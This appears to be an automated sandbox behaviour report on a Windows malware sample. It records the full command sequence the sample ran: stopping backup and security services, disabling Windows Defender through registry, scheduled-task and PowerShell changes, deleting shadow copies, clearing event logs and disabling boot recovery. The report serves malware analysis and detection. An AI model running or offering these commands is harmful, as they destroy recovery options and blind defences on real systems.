Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3192 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 1180 wrote to memory of 1040 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1180 wrote to memory of 1040 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 1152 wrote to memory of 3000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1152 wrote to memory of 3000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 1304 wrote to memory of 656 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1304 wrote to memory of 656 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 1676 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 652 wrote to memory of 1676 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 4088 wrote to memory of 3676 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4088 wrote to memory of 3676 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3144 wrote to memory of 4056 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3144 wrote to memory of 4056 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 1784 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1784 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 408 wrote to memory of 444 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 408 wrote to memory of 444 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 2852 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2852 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe

"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_13659" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13659" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_13659" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/1180-115-0x0000000000000000-mapping.dmp

memory/1040-116-0x0000000000000000-mapping.dmp

memory/1152-117-0x0000000000000000-mapping.dmp

memory/3000-118-0x0000000000000000-mapping.dmp

memory/1304-119-0x0000000000000000-mapping.dmp

memory/656-120-0x0000000000000000-mapping.dmp

memory/652-121-0x0000000000000000-mapping.dmp

memory/1676-122-0x0000000000000000-mapping.dmp

memory/4088-123-0x0000000000000000-mapping.dmp

memory/3676-124-0x0000000000000000-mapping.dmp

memory/3144-125-0x0000000000000000-mapping.dmp

memory/4056-126-0x0000000000000000-mapping.dmp

memory/1784-127-0x0000000000000000-mapping.dmp

memory/1088-128-0x0000000000000000-mapping.dmp

memory/408-129-0x0000000000000000-mapping.dmp

memory/444-130-0x0000000000000000-mapping.dmp

memory/2852-131-0x0000000000000000-mapping.dmp

memory/3852-132-0x0000000000000000-mapping.dmp

memory/1496-133-0x0000000000000000-mapping.dmp

memory/2896-134-0x0000000000000000-mapping.dmp

memory/1672-135-0x0000000000000000-mapping.dmp

memory/2448-136-0x0000000000000000-mapping.dmp

memory/2408-137-0x0000000000000000-mapping.dmp

memory/1680-138-0x0000000000000000-mapping.dmp

memory/3980-139-0x0000000000000000-mapping.dmp

memory/2128-140-0x0000000000000000-mapping.dmp

memory/2240-141-0x0000000000000000-mapping.dmp

memory/4024-142-0x0000000000000000-mapping.dmp

memory/3040-143-0x0000000000000000-mapping.dmp

memory/1960-144-0x0000000000000000-mapping.dmp

memory/1632-145-0x0000000000000000-mapping.dmp

memory/1976-146-0x0000000000000000-mapping.dmp

memory/3636-147-0x0000000000000000-mapping.dmp

memory/3656-148-0x0000000000000000-mapping.dmp

memory/2148-149-0x0000000000000000-mapping.dmp

memory/1432-150-0x0000000000000000-mapping.dmp

memory/2912-151-0x0000000000000000-mapping.dmp

memory/1040-152-0x0000000000000000-mapping.dmp

memory/2012-153-0x0000000000000000-mapping.dmp

memory/2252-154-0x0000000000000000-mapping.dmp

memory/2980-155-0x0000000000000000-mapping.dmp

memory/1676-156-0x0000000000000000-mapping.dmp

memory/1400-157-0x0000000000000000-mapping.dmp

memory/1016-158-0x0000000000000000-mapping.dmp

memory/2220-159-0x0000000000000000-mapping.dmp

memory/1072-160-0x0000000000000000-mapping.dmp

memory/444-161-0x0000000000000000-mapping.dmp

memory/668-162-0x0000000000000000-mapping.dmp

memory/1720-163-0x0000000000000000-mapping.dmp

memory/1284-164-0x0000000000000000-mapping.dmp

memory/2792-165-0x0000000000000000-mapping.dmp

memory/3976-166-0x0000000000000000-mapping.dmp

memory/1836-167-0x0000000000000000-mapping.dmp

memory/1848-168-0x0000000000000000-mapping.dmp

memory/2736-169-0x0000000000000000-mapping.dmp

